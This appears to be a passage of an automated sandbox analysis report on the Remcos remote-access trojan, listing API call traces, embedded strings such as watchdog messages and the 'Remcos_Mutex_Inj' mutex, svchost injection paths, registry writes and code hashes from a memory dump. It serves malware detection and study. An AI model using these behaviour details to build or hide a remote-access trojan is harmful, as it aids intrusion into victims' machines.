                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 75b27c31078e803c67561eca8991e92f08cf1f46e7f1a7dd6019d3f2d77241c9
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 75b27c31078e803c67561eca8991e92f08cf1f46e7f1a7dd6019d3f2d77241c9
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                  • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                  • wcslen.MSVCRT ref: 00409C25
                                  • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                  • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                  • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                  • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                  • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                  • API String ID: 2459104678-694575909
                                  • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                  • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                  • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
